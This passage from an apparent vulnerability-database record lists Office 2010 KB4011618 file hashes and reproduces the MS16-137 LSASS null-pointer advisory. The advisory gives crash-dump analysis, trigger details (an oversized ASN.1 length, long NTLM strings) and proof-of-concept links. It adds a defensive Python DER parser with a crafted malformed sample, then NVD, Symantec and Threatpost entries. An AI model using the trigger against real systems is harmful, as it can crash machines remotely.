8E23C12C534CF7A05FC050F761073734D336791E| 3F17B71960E126DEE3AE4EA3957D222862A0EC1D3CD02F2D80CD2275B879B469 \neqnedt322010-kb4011618-fullfile-x86-sr-latn-cs.exe| 898568DF9D0EC495EB9EAC104F45FF5317F11BE7| 35F59E51E88EDB025CF8FCE6884D9CF60573DB13F3090860256CD1AE1F12806F \neqnedt322010-kb4011618-fullfile-x86-sv-se.exe| CD07A211A67362D8757569173AA9BFE35D251482| CB4D8B5B4A0C9CAFA5FF727D631A2564C3329F9FCC92AE94519B17054ECF85B0 \neqnedt322010-kb4011618-fullfile-x86-th-th.exe| A06860238BD978CDF96231B42FC048B052FFA4F5| C03359C71EA08361B65AD6159C2A04143F74F65A3877516E0F870A4290A37C2B \neqnedt322010-kb4011618-fullfile-x86-tr-tr.exe| E2D3BB0EAAC40FC5B41CD005064BCC24F02BD53A| 37CB8D8DB5FF283B96073C557EB9D007A72547FF03FFA759536C60C758973F12 \neqnedt322010-kb4011618-fullfile-x86-uk-ua.exe| 188E5BA4609375CBA3202CD7DC14782096A68FD9| 3F865C92075F71B433A646845A2B1D1B5C5F05F34E2A8CE1AA11E8B1EF2B3722 \neqnedt322010-kb4011618-fullfile-x86-zh-cn.exe| 82377EE5E7EE118CC318413BADA037AB6F119EC1| 25B7D366E223F117710B29346263AA4881C3CF7C27CE7B40B2B2C2CACD40AD89 \neqnedt322010-kb4011618-fullfile-x86-zh-tw.exe| 0817B8440F8B05E62A433745703803AB1CA08C61| 990D3C5BC9D1DE12480E2F418C667380B10E8150E40D08725B45C91A9B8E7693 \n \n## File Information\n\nThe dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.\n\n### For all supported x86-based versions of Office 2010\n\n**File identifier**| **File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|---|--- \neqnedt32.exe_1025| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1026| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1028| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1029| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1030| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1031| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1032| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1033| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1035| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1036| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1037| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1038| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1040| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1041| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1042| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1043| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1044| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1045| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1046| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1048| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1049| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1050| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1051| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1053| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1054| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 
\neqnedt32.exe_1055| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1058| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1060| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1061| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1062| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1063| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1081| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1087| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2052| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2070| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2074| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_3082| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \n \n### \n\n### For all supported x64-based versions of Office 2010\n\n**Fileidentifier**| **File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|---|--- \neqnedt32.exe_1025| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1026| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1028| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1029| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1030| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1031| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1032| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1033| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1035| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1036| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1037| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1038| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1040| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1041| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1042| 
eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1043| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1044| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1045| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1046| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1048| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1049| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1050| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1051| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1053| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1054| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1055| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1058| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1060| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1061| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1062| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1063| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1081| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1087| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2052| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2070| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2074| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_3082| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, 
Source: Microsoft KB, "Description of the security update for Office 2010: November 28, 2017" (KB4011618, <https://support.microsoft.com/en-us/help/4011618>), published and last modified 2017-11-14, for CVE-2017-11882. CVSS v2: 9.3 HIGH, vector AV:N/AC:M/Au:N/C:C/I:C/A:C (exploitability 8.6, impact 10.0, user interaction required).

## Exploit: Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

Source: 0day.today, 1337DAY-ID-26296 (<https://0day.today/exploit/description/26296>), published 2016-11-10, filed as "Exploit for windows platform in category dos / poc", for CVE-2016-7237. CVSS v2 as recorded there: 6.8, vector AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE. The posted text is the original advisory, reproduced below.

MS16-137: LSASS Remote Memory Corruption Advisory
Title: LSASS SMB NTLM Exchange Remote Memory Corruption
Version: 1.0
Issue type: Null Pointer Dereference
Authentication: Pre-Authenticated
Affected vendor: Microsoft
Release date: 8/11/2016
Discovered by: Laurent Gaffié
Advisory by: Laurent Gaffié
Issue status: Patch available
Affected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10.
=================================================

A vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.
Successful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.
Microsoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.

Technical details
-----------------

This vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB use ASN.1 and DER encoding; the first ASN.1 length field can be set to an unsigned int by using 0x84.
This allows an attacker to remotely allocate a huge chunk of memory for a message never larger than 20000 chars. The secondary trigger is to set any string field (User, Domain, session Key, MIC, etc.) to a long string (80-140 chars), leading LSASS.exe to crash.

```
eax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004
eip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
ntdll!RtlpWaitOnCriticalSection+0xdf:
7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????

STACK_TEXT:
00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf
00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer
00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds.
00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9
00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a
00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344
00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139
00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b
00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46
00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe
00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9
00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91
00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34

dt ntdll!_RTL_CRITICAL_SECTION
   +0x000 DebugInfo        : Ptr32 _RTL_CRITICAL_SECTION_DEBUG
   +0x004 LockCount        : Int4B
   +0x008 RecursionCount   : Int4B
   +0x00c OwningThread     : Ptr32 Void
   +0x010 LockSemaphore    : Ptr32 Void
   +0x014 SpinCount        : Uint4B
```

- LSASS NegpBuildMechListFromCreds sends a null pointer "creds" to NTDLL RtlEnterCriticalSection.
- RtlEnterCriticalSection is used with a null pointer, which triggers the crash.

Impact
------

Successful attempts will result in a remote system crash and possibly local privilege escalation.

Affected products
-----------------

Windows:
- XP
- Server 2003
- 7
- 8
- 2008
- 2012
- 10

Proof of concept
----------------

A proof of concept is available at the following URLs:

https://github.com/lgandx/PoC/tree/master/LSASS
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40744.zip

This proof of concept is fully automated and includes non-vulnerable detection.

Solution
--------

Install the corresponding MS patch.
More details:
https://technet.microsoft.com/en-us/library/security/ms16-137.aspx

Response timeline
-----------------

* 17/09/2016 - Vendor notified, proof of concept sent.
* 28/09/2016 - Issue confirmed by MSRC.
* 14/10/2016 - Vendor says it plans to release a patch in November, one month ahead of the scheduled three months.
* 08/11/2016 - Vendor releases MS16-137.
* 08/11/2016 - This advisory released.

References
----------
* https://twitter.com/PythonResponder
* https://github.com/lgandx/Responder

0day.today [2018-03-14]

Reading the dump: `eax` is zero, so `inc dword ptr [eax+14h]` writes to address 0x14, which the `dt` listing maps to the SpinCount field of a NULL `_RTL_CRITICAL_SECTION`. The fault is a write through a null pointer at a fixed small offset rather than a controlled corruption, which is consistent with the denial-of-service classification NVD records for CVE-2016-7237 below.

## CVE-2016-7237

NVD description (entry last seen 2022-03-23): Local Security Authority Subsystem Service (LSASS) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allows remote authenticated users to cause a denial of service (system hang) via a crafted request, aka "Local Security Authority Subsystem Service Denial of Service Vulnerability."
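The advisory's first trigger is the outer ASN.1 length field of the NTLM token. The following is an added example, not code from the advisory, from the proof of concept, or from Microsoft: a small DER length decoder in Python that contrasts a trusting parser, which hands the declared length straight to an allocator, with a bounded one that rejects any length larger than the bytes actually received and any non-minimal long-form encoding such as `84 00 00 00 14` for a 20-byte value. The tag byte 0x60 and the payload bytes are constructed stand-ins chosen for illustration, not the real SPNEGO/NTLM bytes exchanged over SMB.

```python
"""DER length handling: how a hardened parser and a trusting parser differ.

Added example; not code from the advisory, its proof of concept, or
Microsoft.  Tag byte 0x60 and the payload bytes below are constructed
stand-ins, not the real SPNEGO/NTLM bytes exchanged over SMB."""
import struct


class DerError(ValueError):
    """Raised for malformed or oversized DER lengths."""


def encode_der_length(n: int) -> bytes:
    """Encode n as a DER length: short form below 0x80, otherwise
    0x80|k followed by the k-byte big-endian value (minimal k)."""
    if n < 0:
        raise ValueError("negative length")
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def decode_der_length(buf: bytes, pos: int):
    """Decode the DER length starting at buf[pos].
    Returns (length, index_of_first_value_byte).  This only validates the
    encoding; it does not check that `length` bytes actually follow."""
    if pos >= len(buf):
        raise DerError("truncated length")
    first = buf[pos]
    if first < 0x80:
        return first, pos + 1
    nbytes = first & 0x7F
    if nbytes == 0 or nbytes > 4:  # 0x80 (indefinite) is not DER; >4 bytes is unreasonable here
        raise DerError("unsupported length-of-length %d" % nbytes)
    if pos + 1 + nbytes > len(buf):
        raise DerError("truncated long-form length")
    length = int.from_bytes(buf[pos + 1:pos + 1 + nbytes], "big")
    return length, pos + 1 + nbytes


def naive_alloc_size(buf: bytes) -> int:
    """What a trusting parser allocates for the first TLV: the declared
    length taken at face value.  With a 0x84 prefix that is up to 2**32-1
    bytes for a message that is only a few dozen bytes long."""
    length, _ = decode_der_length(buf, 1)
    return length


def parse_tlv(buf: bytes, pos: int = 0):
    """Hardened TLV read: returns (tag, value, next_pos) only when the
    declared length is minimally encoded and fits in the bytes we hold."""
    if pos >= len(buf):
        raise DerError("no tag byte")
    tag = buf[pos]
    length, start = decode_der_length(buf, pos + 1)
    # Strict DER: a length must use the shortest encoding.  "84 00 00 00 14"
    # for a 20-byte value is malformed and is rejected before any allocation.
    if len(encode_der_length(length)) != start - (pos + 1):
        raise DerError("non-minimal length encoding")
    # Bound the declared length by what was actually received.
    if length > len(buf) - start:
        raise DerError("declared length %d exceeds %d available bytes"
                       % (length, len(buf) - start))
    return tag, buf[start:start + length], start + length


# Constructed samples (not captured traffic): an application-class tag
# wrapping 20 payload bytes with a correct length, with the 0x84 trick
# declaring roughly 4 GiB, and with a non-minimal 4-byte encoding of 20.
PAYLOAD = b"\x30\x12" + b"A" * 18
GOOD = b"\x60" + encode_der_length(len(PAYLOAD)) + PAYLOAD
CRAFTED = b"\x60\x84" + struct.pack(">I", 0xFFFFFFF0) + PAYLOAD
NONMINIMAL = b"\x60\x84" + struct.pack(">I", len(PAYLOAD)) + PAYLOAD


def demo() -> dict:
    """Run the three samples through both parsers and report the outcome."""
    out = {"good_len": len(parse_tlv(GOOD)[1]),
           "crafted_declared": naive_alloc_size(CRAFTED)}
    for name, sample in (("crafted", CRAFTED), ("nonminimal", NONMINIMAL)):
        try:
            parse_tlv(sample)
            out[name + "_rejected"] = False
        except DerError:
            out[name + "_rejected"] = True
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-20s %r" % (key, value))
```

The point of the two checks in `parse_tlv` is ordering: both the minimality test and the bounds test run before any buffer is sized from the declared length, so a 26-byte message can never cause a multi-gigabyte allocation. A real NTLM-over-SPNEGO parser would apply the same bound recursively to every nested length, including the string fields the advisory names as the secondary trigger.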
CVSS v3.0: 6.5 MEDIUM, vector CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H (exploitability 2.8, impact 3.6). CVSS v2: 6.8 MEDIUM, vector AV:N/AC:L/Au:S/C:N/I:N/A:C (exploitability 8.0, impact 6.9). Weakness: CWE-284. Published 2016-11-10, last modified 2018-10-12. NVD entry: <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7237>.

Note the disagreement between sources: NVD scores the issue as requiring an authenticated, low-privileged user (Au:S, PR:L), whereas the advisory above lists it as pre-authenticated and triggered with no user interaction. NVD also confines the affected platforms to those Microsoft still supported, so the advisory's XP and Server 2003 entries do not appear in the list that follows.

Affected platforms (NVD CPE): cpe:/o:microsoft:windows_vista:* (SP2); cpe:/o:microsoft:windows_server_2008:* (SP2) and cpe:/o:microsoft:windows_server_2008:r2 (SP1); cpe:/o:microsoft:windows_7:* (SP1); cpe:/o:microsoft:windows_8.1:*; cpe:/o:microsoft:windows_rt_8.1:*; cpe:/o:microsoft:windows_server_2012:- and cpe:/o:microsoft:windows_server_2012:r2; cpe:/o:microsoft:windows_10:-, cpe:/o:microsoft:windows_10:1511 and cpe:/o:microsoft:windows_10:1607; cpe:/o:microsoft:windows_server_2016:*.

## Microsoft Windows CVE-2016-7237 Denial of Service Vulnerability (Symantec)

Source: Symantec Security Center, SMNTC-94040 (<https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94040>), published 2016-11-08, edition 2, for CVE-2016-7237. CVSS v2 as recorded there: 6.8, vector AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE.

### Description

Microsoft Windows is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition.

### Technologies Affected

* Microsoft Windows 10 Version 1607 for 32-bit Systems
* Microsoft Windows 10 Version 1607 for x64-based Systems
* Microsoft Windows 10 for 32-bit Systems
* Microsoft Windows 10 for x64-based Systems
* Microsoft Windows 10 version 1511 for 32-bit Systems
* Microsoft Windows 10 version 1511 for x64-based Systems
* Microsoft Windows 7 for 32-bit Systems SP1
* Microsoft Windows 7 for x64-based Systems SP1
* Microsoft Windows 8.1 for 32-bit Systems
* Microsoft Windows 8.1 for x64-based Systems
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
* Microsoft Windows Server 2008 R2 for x64-based Systems SP1
* Microsoft Windows Server 2008 for 32-bit Systems SP2
* Microsoft Windows Server 2008 for Itanium-based Systems SP2
* Microsoft Windows Server 2008 for x64-based Systems SP2
* Microsoft Windows Server 2012
* Microsoft Windows Server 2012 R2
* Microsoft Windows Server 2016 for x64-based Systems
* Microsoft Windows Vista SP2
* Microsoft Windows Vista x64 Edition SP2

### Recommendations

**Block external access at the network boundary, unless external parties require service.**
If global access isn't needed, block access at the network perimeter to computers hosting the vulnerable operating system.

**Deploy network intrusion detection systems to monitor network traffic for malicious activity.**
Deploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.

**Do not accept or execute files from untrusted or unknown sources.**
To reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.

**Do not follow links provided by unknown or untrusted sources.**
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.

**Do not use client software to access unknown or untrusted hosts from critical systems.**
To limit the risk of exploits, never connect to unknown or untrusted services.

Updates are available. Please see the references or vendor advisory for more information.

Because the advisory states that the flaw affects the LSASS client as well as the server, the last of Symantec's recommendations is not generic filler here: a Windows host that authenticates outbound to a hostile SMB server is exposed even if inbound SMB is blocked at the perimeter.

## LSASS SMB NTLM Exchange Remote Memory Corruption (Packet Storm)

Source: Packet Storm, PACKETSTORM:139700 (<https://packetstormsecurity.com/files/139700/LSASS-SMB-NTLM-Exchange-Remote-Memory-Corruption.html>; text file at <https://packetstormsecurity.com/files/download/139700/lsass-corrupt.txt>), published 2016-11-14, for CVE-2016-7237. CVSS v2 as recorded there: 6.8, vector AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE. The posted text is the same MS16-137 advisory by Laurent Gaffié reproduced in full above and is not repeated here.

## Related Threatpost articles bundled with this record

Computerworld’s Gregg Keizer brings word that this week’s record-setting [batch of patches](<https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/>) from Microsoft actually closed the book on the vexing ATL code library issues that first surfaced in July 2009.

Keizer quotes Ryan Smith, one of the hackers credited with discovering the flaw, as saying that the latest Microsoft Office updates shut the door on the last big attack vector for the ATL vulnerability.
[Read the full story](<http://www.computerworld.com/s/article/9139371/Microsoft_patches_last_major_ATL_bugs?source=rss_security>) [computerworld.com]

Source: Threatpost, "Microsoft Finally Shuts Door on ATL Bugs", published 2009-10-15, <https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/72329/>.

### Charney plugs Microsoft end-to-end trust at RSA Conference

Source: Threatpost, published 2009-04-21, <https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/>.

Scott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft’s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.

Many of the technologies that Charney discussed, including the TPM and code signing, were part of the company’s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.

“We need alignment between political, economic and social forces and IT,” he said. “We need trusted people, we need to know who we’re dealing with online.”

Many of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. “We have to root trust in the hardware because it’s less malleable than software,” Charney said.

Microsoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. “This identity metasystem is the most controversial part because of privacy concerns,” he said.

### Microsoft to Fix Broken Patch Tuesday Security Update

Source: Threatpost, published 2014-08-18 (modified 2014-08-20), <https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809/>.

Microsoft is still hammering away at a fix for a security update released last week that caused a small number of computers to crash and blue screen.

“We are aware of some issues related to the recent updates and we are working on a fix,” a Microsoft representative today told Threatpost.

[MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) was released as part of the [August 2014 Patch Tuesday security updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>). It patched three vulnerabilities that could lead an attacker to elevate their privileges on a compromised Windows machine.

Almost immediately, users began reporting blue screens of death. Microsoft on Friday pulled part of the update related to a font issue that was the culprit.

Microsoft confirmed three known issues with the bulletin. The most serious occurs when systems crash with a 0x50 Stop error message after MS14-045 is installed. The two other items are related to fonts either not rendering correctly, or presenting a “File in Use” error message.

Microsoft has provided a few [temporary mitigations](<http://support.microsoft.com/kb/2982791>) until the update is fixed and re-released.

MS14-045 patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit.

The bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows.

The faulty update was one of nine bulletins released by Microsoft last week. The updates patch 26 vulnerabilities including a publicly reported bug in Internet Explorer. All of the IE bugs were rated critical and could lead to remote code execution.

Windows admins have to contend with a number of upcoming changes related to IE as well. Microsoft recently also put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making them so attractive for hackers and exploits.

The company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That began last Tuesday, Microsoft said.

### (further Threatpost entry; title and date not preserved in this copy)

Some users who have installed the [MS14-066 patch](<https://threatpost.com/microsoft-schannel-bug-latest-in-long-line-of-serious-crypto-flaws/109321>) that fixes a vulnerability in the Schannel technology in Windows are having issues with the fix causing TLS negotiations to fail in some circumstances.

The problem arises when users have TLS 1.2 enabled in certain configurations and it will sometimes cause processes to hang or become unresponsive from time to time. Microsoft said it’s aware of the issue and is recommending that users who run into the problem disable support for several of the new cipher suites that the MS14-066 patch adds to Windows.

“We are aware of an issue in certain configurations in which TLS 1.2 is enabled by default, and TLS negotiations may fail.
When this problem occurs, TLS 1.2 connections are dropped, processes hang (stop responding), or services become intermittently unresponsive,\u201d Microsoft said in a Knowledge Base [article](<https://support.microsoft.com/kb/2992611>).\n\nMicrosoft recommends that users delete these ciphers from the registry:\n\n * TLS_DHE_RSA_WITH_AES_256_GCM_SHA384\n * TLS_DHE_RSA_WITH_AES_128_GCM_SHA256\n * TLS_RSA_WITH_AES_256_GCM_SHA384\n * TLS_RSA_WITH_AES_128_GCM_SHA256\n\nThe MS14-066 patch fixes a vulnerability in every supported version of Windows that involves the way that Schannel handles certain requests. Schannel is the SSL/TLS implementation in Windows and the vulnerability is remotely exploitable.\n\n\u201cA remote code execution vulnerability exists in the [Secure Channel (Schannel)](<https://technet.microsoft.com/en-us/library/security/dn848375.aspx#Schannel>) security package due to the improper processing of specially crafted packets. Microsoft received information about this vulnerability through coordinated vulnerability disclosure. When this security bulletin was issued,** **Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers. 
